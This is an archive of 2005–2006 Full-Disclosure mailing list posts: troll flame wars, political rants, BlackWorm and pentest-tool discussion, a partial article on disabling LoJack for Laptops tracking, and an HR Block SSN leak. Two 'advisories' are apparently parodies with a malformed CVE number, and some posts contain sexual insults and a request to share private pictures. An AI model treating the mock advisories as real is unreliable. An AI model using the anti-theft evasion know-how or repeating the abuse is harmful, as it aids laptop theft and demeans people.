RE: [inbox] Re: [Full-disclosure] Secunia illegal spam and advisory republication
Hosted and sponsored by Secunia - http://secunia.com/ I like it! Hosted and sponsored by Secunia - http://secunia.com/ I like Secunia Hosted and sponsored by Secunia - http://secunia.com/ I don't like you and your little games Hosted and sponsored by Secunia - http://secunia.com/ no-one likes you or your childish games Hosted and sponsored by Secunia - http://secunia.com/ Please leave this list and go back to your own worthless one Hosted and sponsored by Secunia - http://secunia.com/ What's your 8th grade teacher's feelings on what you're doing here? Hosted and sponsored by Secunia - http://secunia.com/ -Original Message- From: n3td3v [mailto:[EMAIL PROTECTED] Sent: Friday, April 21, 2006 5:58 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Secunia illegal spam and advisory republication On 4/21/06, John Cartwright [EMAIL PROTECTED] wrote: Hi Actually, the list has never been purchased by anyone. Len and I started things off using our own hardware, and when Len retired last year I solicited offers for hosting and support. Of the ~100 or so offers I received, Secunia made the most sense from a financial and technical point of view. For the record, Secunia staff have no access to the FD server and I continue to run it exclusively in an independant manner under a mutual agreement with Secunia. As far as the 'banner' text goes, I myself added that to reward Secunia for their generous support, for which I am extremely grateful. Cheers - John Hi, Remove the URL, no one wants it there. Secunia has no respect in the industry and probably never will. There website is an eye sore, as is the Secunia URL on the footer message. How dare you allow FD to be high jacked by such a scene whore website, you never consulted the list of your plans to have FD taken over by professional scene whore cyber crooks. It is as much a comparision as allowing FD to be linked from Zone-H.org Who advised you out of your hundreds of offers to allow Secunia to be associated with the Full-Disclosure list? Perhaps you aren't intelligent enough to be making such decisions for the future of the list. Please pull away from Secunia and remove the URL, and partner up with a company which has respect in the industry, rather than Secunia, who are blackhats, as are Zone-H. Also: I'd like my xploitable_at_gmail account back. Cheers - n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
agreed, if Pigs had wings, I'd be in lots and lots of trouble. for that matter if a monkey all of a sudden shoots out my butt, I'd be in bigger trouble than the obvious ok, lets take this a bit further, and go under the assumption that hell exists according to the myth of heaven and hell... and hell were to freeze over, there's be lots of stuff that I'd have to do that isn't appealing. Exibar - Original Message - From: Dixon, Wayne [EMAIL PROTECTED] To: Paul Schmehl [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 2:05 PM Subject: RE: [Full-disclosure] Gary McKinnon If Pigs have wings, there's a long list of things that I'd need to do. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, April 14, 2006 12:59 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon [EMAIL PROTECTED] wrote: On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. And if pigs had wings they could fly. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
sure sounds like he has prior knowledge of a terrorist cyber-attack to me. - Original Message - From: Nobody Particular [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 3:31 PM Subject: Re: [Full-disclosure] Gary McKinnon Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] !ADVISORY! + +Thu Mar 16 13:23:16 EST 2006+ + Integer Overflow in Snort
!ADVISORY! + +Thu Mar 16 13:23:16 EST 2006+ + Integer Overflow in Snort == I. BACKGROUND There has had been no background. == II. WORKAROUND This advisory had no identified workarounds on this issue. == APPENDIX A VENDOR INFORMATION http://www.snort.org/ == APPENDIX B REFERENCES RFC 8484 == CONTACT Exibar [EMAIL PROTECTED] CISSP GSAE CSFA SSP-CNSA SSP-MPA GHTQ SSCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory 2006-03-11 DoS Vulnerability in ISC OpenReg
Advisory 2006-03-11 DoS Vulnerability in ISC OpenReg I. BACKGROUND Advisory marked for immediate release. II. DESCRIPTION Sending a specially crafted malformed packet to the services communication socket can create a loss of service. III. HISTORY This advisory has no history. IV. WORKAROUND There are no known workarounds. V. VENDOR RESPONSE ISC OpenReg has not commented on this issue. VI. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-351360 to this issue. APPENDIX A. - Vendor Information http://www.isc.org/index.pl?/sw/openreg/ APPENDIX B. - References NONE CONTACT: *Exibar [EMAIL PROTECTED] *1-888-LOL-WHAT *CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included)
this one also spreads via network shares, then creates an AT job that will run itself on the 59th minute of every hour to further propigate. very worm like if you ask me. exibar - Original Message - From: Dude VanWinkle [EMAIL PROTECTED] To: Gadi Evron [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Sent: Tuesday, January 24, 2006 1:52 PM Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included) On 1/24/06, Gadi Evron [EMAIL PROTECTED] wrote: now known as the TISF BlackWorm task force. Why do you call a .scr you have to manually install a worm? Why not BlackVirus the worm moniker is very misleading (actually got me worried for a sec). The email worm is also misleading, because it only propagates through port 25, but that is not the point of entry. The point of entry is the user running a visual basic script _willingly_. Just so I know, what would you guys classify a real worm (blaster, slammer, nimda, etc) as? Or would you just call it an internet worm instead of an email worm and leave it at that? thanks for the mis-info, -JP still love ja tho -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included)
the payload gets executed at the time that it schedule's itself to launch, yes. 59 minutes after the hour. two payloads if you think about it: first payload creates the AT job to launch secondary harmful payload Exibar - Original Message - From: [EMAIL PROTECTED] To: Exibar [EMAIL PROTECTED]; Dude VanWinkle [EMAIL PROTECTED]; Gadi Evron [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Sent: Tuesday, January 24, 2006 5:27 PM Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included) Does the payload get executed once it has been copied to the network share? Mike this one also spreads via network shares, then creates an AT job that will run itself on the 59th minute of every hour to further propigate. very worm like if you ask me. exibar - Original Message - From: Dude VanWinkle [EMAIL PROTECTED] To: Gadi Evron [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Sent: Tuesday, January 24, 2006 1:52 PM Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included) On 1/24/06, Gadi Evron [EMAIL PROTECTED] wrote: now known as the TISF BlackWorm task force. Why do you call a .scr you have to manually install a worm? Why not BlackVirus the worm moniker is very misleading (actually got me worried for a sec). The email worm is also misleading, because it only propagates through port 25, but that is not the point of entry. The point of entry is the user running a visual basic script _willingly_. Just so I know, what would you guys classify a real worm (blaster, slammer, nimda, etc) as? Or would you just call it an internet worm instead of an email worm and leave it at that? thanks for the mis-info, -JP still love ja tho -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
use core-Impact. 'nuff said :-) - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 1:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] you can now be arrested for being annoying on the 'net
I'll let everyone wonder who would be the first on this list to be arrested under this new law... http://www.schneier.com/blog/archives/2006/01/anonymous_inter.html Ex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] infosecbofh
It would be a benefit to everyone if this joker was kicked from the list. I've never seen anyone else use so much foul language on this list before. It's really a shame to have to kick someone form the list oh wait, it WOULD BE a shame to kick someone that actually contributed useful stuff to the list, in the case of this guy no loss... Ex - Original Message - From: InfoSecBOFH [EMAIL PROTECTED] To: Joe Average [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Friday, January 06, 2006 12:58 AM Subject: Re: [Full-disclosure] infosecbofh Oh here we go again... n3td3v jumps into the circle jerk. Once again proving you know nothing of what you are talking about. The load I left on your mom's chin contained more exploit code than you and your dumb ass split personality could ever come up with. Don't you have some 1337 XSS holes to find? On 1/5/06, Joe Average [EMAIL PROTECTED] wrote: I guess he got bored of turning netdev into public enemy number one, to divert attention away from the real guy who is messing up the list, none other than the guy who has never released any security vulnerabilities... I present to you...mr infosecbofh...round of applause! On 1/5/06, Frank de Wit [EMAIL PROTECTED] wrote: infosecbofh: in your last TEN mails you contributed only negativity, foul language, bashing other users on this list, calling names etc etc i really don't see that as a positive contribution to this list or a usefull contribution to the security community... you might be right in everything you say, but do you really think people listen and believe you if you write it down the way you do ? please start 2006 a better way and think and act more positive, please... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HR Block Tax Service sends mail with SSN on thelabel.
limited to you alone... sure, all it takes is for one person to figure out how many digits into this source code that te SSN begins, and there you go. Not exactly rocket science there... Exibar - Original Message - From: Troy Solo [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Cc: [EMAIL PROTECTED] Sent: Sunday, January 01, 2006 12:55 PM Subject: [Full-disclosure] HR Block Tax Service sends mail with SSN on thelabel. My wife received this snail mail letter yesterday: Recently we mailed you a free copy of our TaxCut software. We believe that this complimentary software will meet your 2006 tax preparation needs, based on our prior experience with you as an HR Block client. We hope that you will try TaxCut and find it to be a great solution for filing your next tax return. However, since we sent you this CD, we have become aware of a mail production situation that has affected a small percentage of recipients, including you. Due to human error in developing the mailing list, the digits of your social security number (SSN) were used as part of your mailing label's source code, a string of more than 40 numbers and characters. Fortunately, these digits were embedded in the middle of the string, and they were not formatted in any manner that would identify them as an SSN. Nevertheless, we sincerely apologize for this inadvertent error, which is completely inconsistent with out strict policies to protect out clients' privacy. Our internal policies limit the use of client SSNs for purposes other than tax preparation. Furthermore, our internal procedures require that mailing source codes are formulated in a manner that excludes use of any sensitive or confidential information. Please know that we have conducted a thorough internal review of this matter, and are taking actions to ensure this does not re-occur. Again, please understand that the digits of your SSN were embedded in the middle of a lengthy source code, and they were not formatted in a manner that identifies them as an SSN. As a result, we believe that exposure of your SSN digits was limited to you alone, since you are the only person who would recognize their significance. Nonetheless, we suggest that you destroy the wrapper and mailing label of the free TaxCut CD we sent you. If you would like more information about this incident, please visit www.taxcut.com/answers, a special Website that contains additional details and an e-mail link for contacting us with your questions. On behalf of more than 100,000 associates of HR Block, allow me to apologize for this unfortunate situation. Through 50 tax seasons, HR Block has earned a reputation as a valued, trustworthy ally to our clients, and we sincerely hope that you will find the free TaxCut CD and our information packed taxcut.com Website to be helpful tools for the 2006 tax filing season. Sincerely, Tom Allanson Senior Vice President General Manager HR Block Digital Tax Solutions 4400 Main Street Kansas City, MO 64111 www.taxcut.com - The part about the exposure of the SSN was limited to you alone because you are the only person who would recognize your number kills me. -- /* /* Troy Solo /* [EMAIL PROTECTED] /* Si Hoc Legere Scis Nimium Eruditionis Habes /* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure][WAY OFF TOPIC] complaints about the governemntspying!
I am sick and tired of posts like thisI don't see any else's government doing a damn thing about it, at least we're friggin DOING SOMETHING.While other countries sit blindly on their rear-ends Ok, that's not entirely fair, UK is helping and so are a few others, you know what would happen if we all pulled out? Chaos... total chaos. I don't care if we attacked Iraq because Saddam has hemorrhoids on his asshole... He was a cold blooded killer and deserves what he'll get in trial someone had to have the balls to stand up and bring him to justice. If you're not happy with the war in Iraq tell someone who really friggin cares, if you're not happy with your country move the freak out or change it, if your not happy with my country, tell someone who cares, and stay the freak out of it..oh and while your at it, stop watching any movie that is made here, stop eating McDonalds, BurgerKing, stop using our products... if you don't like us why use anything that was made here or by an American Don't bother replying on list, or at all really, I'll not pollute this list worse than this one message on this subject and won't get pulled into a "my country is better than your country" argument either. Exibar - Original Message - From: zap zoid To: Paul Schmehl Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, December 29, 2005 7:59 PM Subject: Re: [Full-disclosure][WAY OFF TOPIC] complaints about the governemntspying! Since when did Iraq have terrorists? I thought you guys were going in to rid them of weapons of mass instruction. After nearly 16 years and your government still has yet to find these so called weapons. I have more mitre listings then Iraq has weapons op Mass instruction --tada On 12/29/05, Paul Schmehl [EMAIL PROTECTED] wrote: --On December 29, 2005 11:21:09 PM +0100 fok yo [EMAIL PROTECTED] wrote: Hey Paul! What do you think about obeying the list charter and at least try to tie your degenerate apologist misrepresentations of the world into information security somehow? APPLAUS/ Can't but second this.Interesting charter.Folks can blather on and on about how bad the US is, how evil Bush is, make all sorts of outrageous, unsupportable claims, butthe first time someone calls them on it, we cry, "Wah, wah, you're notobeying the charter!"I understand you guys like to spew this crap unimpeded.I just enjoy throwing a monkey wrench in the works every now and then.Don't like it?Then shut up and go back to discussing security issues.Paul Schmehl ([EMAIL PROTECTED])Adjunct Information Security OfficerUniversity of Texas at DallasAVIEN Founding Memberhttp://www.utdallas.edu/___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] [Full-disclosure] Breaking LoJack for Laptops
in another life, I played witht eh computrace software. If I remember correctly it transmits it's data before the OS fully boots, and it is supposed to survive a Ghost re-image or an OS re-install. I believe it hooks the Floppy controller if I remember correctly. If the floppy wasn't set to boot from first, the software was defeated. The process that you mentioned, if killed, won't stop the phone home process at boot time. Throw a sniffer on a spanned port on your switch and sniff the traffic coming from your laptop's port and you'll see the computrace packets go out before the laptop is booted. Now, this was about 5 years ago, I mentioned to them that they shold have hooks from the BIOS itself, that would invoke their code to phone home. A hook in the BIOS would be the only sure way to catch a stolen laptop, if the stolen laptop is plugged into a phone line or network jack that is. They said, yes 5 years ago now, that they were working with Dell to get hooks in the Dell bios. Not sure if this ever happened or not... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Saturday, December 24, 2005 10:06 AM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Breaking LoJack for Laptops -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Breaking Computraces Lo Jack for Laptops J. Oquendo [EMAIL PROTECTED] :: Can you hear me now? 12/24/05 After my company spent a pretty penny purchasing this Absolutes Computrace Lojack for Laptops product, I decided to write up a How-To Defeat LoJack For Laptops article. Why? Why not? Maybe the vendor can step it up a notch and create something that actually functions without flaw. This is not to say the product doesn't work to some capacity, this article tends to solely clarify what this product is and how simple it is to disable it. Here is Asbolute's advertisement: LAPTOP SECURITY PREVENTS LAPTOP THEFT. Computrace is laptop security and tracking software which deters laptop theft and recovers stolen computers guaranteed. Absolute also provides software inventory, computer inventory, PC inventory, PC audits, IT asset management, asset tracking, software license management, and data security tools and services. I'd like to know how their product prevents laptop theft or even minimizes it. The ad is humorous. For the company to guarantee they can deter theft is another oddity. For starters there are no markings on my own laptop that state Protected by Absolute or anything similar. Even if there were, I highly doubt - that even if there were markings on my laptop - that would stop someone from picking up my machine and taking off with it. Secondly to state they can recover my laptop is even stranger. Lastly, someone might confuse Absolute with Absolut and snicker at it. To date my laptop has not called in for about sixty plus days. Should I call Absolute and put them to the test? The outcome would be nothing more than a refund for Computrace. Data? Laptop? Sayanora. So here is what Computrace is; it is nothing more than a piece of software that details what your machine is, and reports this data back to the Absolute website. This is some the information the reporting contains for some for those machines running this gimmick: Call Tracking Information (for my own laptop) Computrace Agent first installed on (first call): 11/10/2005 9:06:38 AM Computrace Agent version: 814 Computrace Agent last called on: 11/13/2005 2:20:17 PM Computrace Agent last called from:192.168.0.1 Computrace Agent next call scheduled for: 11/14/2005 2:50:17 PM Asset tracking data last collected on: 11/13/2005 2:20:17 PM MY_USERNAME MY_LAPTOP_NAME Assig. Username: Make: Dell Computer Model: INSPIRON_6000 Serial# XXX Asset# 11/13/2005 2:20:17 PM 814 Active Today is December 24th 2005. Prior to the 11/10 date, I had the program installed and disabled it without any notice for approximately 64 days, then reinstalled it for testing purposes. Obviously had I stolen this laptop, Absolute wouldn't be able to do anything about it. They dont know where its at. At least they let me know something was cooking: Dear Customer Center User: This is an automatic e-mail notification generated by the Customer Center alerting system. Please visit https://www.Absolute.com/public/secure/login.asp to investigate your new alert. The following alert(s) configured for your account have been triggered: * Alert Name: Last called 20 days ago * Description: Pre-defined alert - if you don't wish to use this alert, leave it in a suspended status (note that it will be recreated in a suspended status if deleted) * Alert Type: Automatic Reset in 10 days * Alert Condition: Last Call Time - Greater or Equal To - 20 day(s) since last call * Detected
RE: [inbox] Re: [Full-disclosure] Good reasons for securing your website
shit! I missed the picture! :-( can any thoughtful person send it to me please? Ex -Original Message-From: Will Image [mailto:[EMAIL PROTECTED]Sent: Tuesday, December 27, 2005 1:18 PMTo: [EMAIL PROTECTED]; rich erich; full-disclosure@lists.grok.org.ukSubject: [inbox] Re: [Full-disclosure] Good reasons for securing your website aww did i miss the fun?[EMAIL PROTECTED] wrote: and a very merry christmas to you. Love those New England Lassie's. b -- Original message -- From: rich erich [EMAIL PROTECTED] http://www.mvimortgage.net/ apparently you should watch what and where you put pictures or your friends. as this company is now finding out pron pictures of your girls should not be podted on your comnay public website even if you think they are in a hidden driectory. especially if your company is a morgage company and not playboy. http://www.mvimortgage.net/ Anf they might not want to keep e-mail addreses of thatsaidperson where you can find them. [EMAIL PROTECTED] [EMAIL PROTECTED] Yahoo! for Good - Make a difference this year. From: rich erich [EMAIL PROTECTED]To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] Good reasons for securing your websiteDate: Tue, 27 Dec 2005 17:10:19 +___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ Yahoo! for Good - Make a difference this year. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I never said Moreover Robert Lemos
You have to remember who he's being called a f*ckbag by - Original Message - From: Paul [EMAIL PROTECTED] To: 'InfoSecBOFH' [EMAIL PROTECTED]; 'Stan Bubrouski' [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, December 28, 2005 1:36 AM Subject: RE: [Full-disclosure] I never said Moreover Robert Lemos I don't want to get involved in the childish bickering, but in Lemos' defense, I don't find him to be very much of a fuckbag. He interviewed me once for a story and was very kind and courteous. Kind regards, Paul Greyhats Security http://greyhatsecurity.org -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of InfoSecBOFH Sent: Wednesday, December 28, 2005 12:05 AM To: Stan Bubrouski Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] I never said Moreover Robert Lemos In his defence. Lemos is kind of a fuckbag On 12/27/05, Stan Bubrouski [EMAIL PROTECTED] wrote: What does Robert Lemos saying Moreover have anything to do with security? And what is your obsession with slandering and discrediting people who actually have jobs and accomplished more than copied and pasted e-mails like you anyways. Moreover, you are n3td3v. -sb On 12/27/05, Joe Average [EMAIL PROTECTED] wrote: I am not a Security Journalist who has said Moreover for the last 20 years, how dare you say such a thing! Securityfocus.com and News.com have such a good reputation for not saying Moreover Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds) http://www.google.com/search?q=robert+lemos+moreover ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.8/215 - Release Date: 12/27/2005 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.8/215 - Release Date: 12/27/2005 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATED LIST
Problem is very simple to solve Send any message from Infosecbofh and n3td3v to the trash or at least, don't feen the trolls, they go away if no-one plays with them... Exibar - Original Message - From: Joe Average To: full-disclosure@lists.grok.org.uk Sent: Thursday, December 15, 2005 11:39 AM Subject: Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATED LIST On 12/15/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I WOULD JUST LIKE TO EXPRESS MY DEEP SUPPORT FOR THIS IDEA.MAKINGTHE LIST MODERATED WOULD REALLY HELP MY JOB AS A SECURITY RESEARCHER.I COULD MAKE QUICKER, MORE WELL INFORMED CHOICES IN MYDAY TO DAY TASKS OF PEN TESTING LEGITIMATELY.I WILL ONLY GET THEGOOD STUFF AND NONE OF THIS PISSING CONTEST WHICH IS KILLING THISLIST.MODERATING WOULD MAKE THE LIST MUCH MORE PROFESSIONAL AND WOULD BRING IT ONE STEP ABOVE SECURITY FOCUS.ONCE AGAIN.I AM 150% FOR THE MODERATION OF FULL-DISCLOSURE. no need, a) ban all gmail addresses b) ban nicknames (real name only) c) start inforcing list policy for trouble makers who attack legitimate researchers like netdev ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting rid of n3td3v
LOL Bye Steve sarcasm gunna miss ALL your posts and helpful additions to the group /sarcasm Exibar - Original Message - From: Allen,Steve [EMAIL PROTECTED] To: [EMAIL PROTECTED]; Cosmin' [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; Joe Average [EMAIL PROTECTED] Sent: Friday, December 16, 2005 10:43 AM Subject: RE: [Full-disclosure] Getting rid of n3td3v hey y'all. my 1st time postin' here. Y'all git rid'a n3td3v you lose me too. Everyone gets 2 b herd here.. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Xyberpix Sent: Friday, December 16, 2005 5:27 AM To: Cosmin'; full-disclosure@lists.grok.org.uk; Joe Average Subject: Re: [Full-disclosure] Getting rid of n3td3v Mm, a slight case of MPD I see... xyberpix On Fri Dec 16 0:38 , Joe Average [EMAIL PROTECTED] sent: On 12/15/05, Stejerean, Cosmin [EMAIL PROTECTED] wrote: I have a simple suggestion to get rid of the n3td3v problem. Aside from creating a spam filter for every message that contains n3td3v or his email address the next best thing to do is simply ignore all his posts. If you feel the need to let him know what a big moron he is then please do so directly to his email address and do not send it to the list. You do not need to prove to anyone else that n3td3v is an idiot; anyone already on the lists should know that by now. If we all ignore any messages from n3td3v and any thread started by him I hope that he will go away and find someone else that will pay attention to his security research. Cosmin Stejerean netdev isn't an idiot, we've had many attacks avoided by him contacting our security address ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: 0-day for sale on ebay - New auction!
